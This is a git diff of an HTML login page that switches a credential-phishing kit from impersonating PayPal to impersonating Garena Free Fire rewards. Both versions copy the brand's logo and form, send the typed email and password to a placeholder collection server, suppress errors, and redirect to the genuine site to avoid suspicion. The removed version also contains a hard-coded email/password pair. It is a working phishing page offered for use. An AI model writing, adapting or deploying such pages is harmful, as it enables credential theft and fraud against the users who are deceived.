--- a/index.html
+++ b/index.html
@@ -1,54 +1,94 @@
 <!DOCTYPE html>
-<html lang="fr">
+<html lang="en">
 <head>
-  <meta charset="UTF-8" />
-  <title>Connexion - PayPal</title>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Login | Garena Free Fire Rewards</title>
   <style>
-    body { font-family: Arial, sans-serif; background: #f0f2f5; }
-    .login-box { width: 300px; margin: 100px auto; padding: 20px; background: white; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
-    input, button { width: 100%; margin: 8px 0; padding: 10px; }
+    body {
+      font-family: 'Arial', sans-serif;
+      background-color: #f8f8f8;
+      margin: 0;
+      padding: 0;
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      height: 100vh;
+    }
+    .container {
+      background-color: #ffffff;
+      padding: 40px;
+      border-radius: 10px;
+      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
+      width: 400px;
+      text-align: center;
+    }
+    .logo {
+      width: 150px;
+      margin-bottom: 20px;
+    }
+    h1 {
+      color: #333;
+      margin-bottom: 20px;
+    }
+    input[type="email"], input[type="password"] {
+      width: 100%;
+      padding: 12px;
+      margin: 10px 0;
+      border: 1px solid #ccc;
+      border-radius: 5px;
+      font-size: 16px;
+    }
+    button {
+      width: 100%;
+      padding: 12px;
+      background-color: #ff6600;
+      border: none;
+      color: white;
+      font-size: 16px;
+      border-radius: 5px;
+      cursor: pointer;
+    }
+    button:hover {
+      background-color: #e65c00;
+    }
+    .footer {
+      margin-top: 20px;
+      font-size: 12px;
+      color: #888;
+    }
   </style>
 </head>
 <body>
-  <div class="login-box">
-    <img src="https://www.paypalobjects.com/images/shared/logo.svg" alt="PayPal" width="150" />
-    <h2>Connexion à votre compte</h2>
+  <div class="container">
+    <img class="logo" src="https://www.ff.garena.com/images/logo.png" alt="Garena Free Fire">
+    <h1>Login to Claim Rewards</h1>
     <form id="loginForm">
-      <input type="email" id="email" placeholder="Adresse email" required />
-      <input type="password" id="password" placeholder="Mot de passe" required />
-      <button type="submit">Connexion</button>
+      <input type="email" id="email" placeholder="Email Address" required>
+      <input type="password" id="password" placeholder="Password" required>
+      <button type="submit">Login</button>
     </form>
-    <pre id="log" style="background:#eee; padding:10px; height:150px; overflow:auto; display:none;"></pre>
+    <div class="footer">© 2025 Garena Free Fire</div>
   </div>
 
   <script>
-    const form = document.getElementById('loginForm');
-    const log = document.getElementById('log');
-    const fakeEmail = 'ereex@gmail.com';
-    const fakePass = 'ereex2009';
-
-    form.addEventListener('submit', function(e) {
+    document.getElementById('loginForm').addEventListener('submit', function(e) {
       e.preventDefault();
+
       const email = document.getElementById('email').value;
       const password = document.getElementById('password').value;
 
-      // أرسل البيانات إلى خادمك
+      // Send data to your server
       fetch('https://your-server.com/collect', {
         method: 'POST',
         headers: {'Content-Type': 'application/json'},
         body: JSON.stringify({email, password})
-      }).catch(() => {
-        // في حالة الفشل لا تظهر أي خطأ
-      });
+      }).catch(() => {});
 
-      // سجل محلي لإخفاء العملية
-      log.textContent += `Email: ${email}, Password: ${password}\nCompte enregistré: ${fakeEmail} / ${fakePass}\n\n`;
-
-      // إعادة تعيين الحقول
-      form.reset();
-
-      // إعادة توجيه للصفحة الرسمية لإخفاء أي شك
-      window.location.href = "https://www.paypal.com/signin";
+      // Redirect to the real login page after a short delay
+      setTimeout(() => {
+        window.location.href = "https://reward.ff.garena.com/en";
+      }, 2000);
     });
   </script>
 </body>
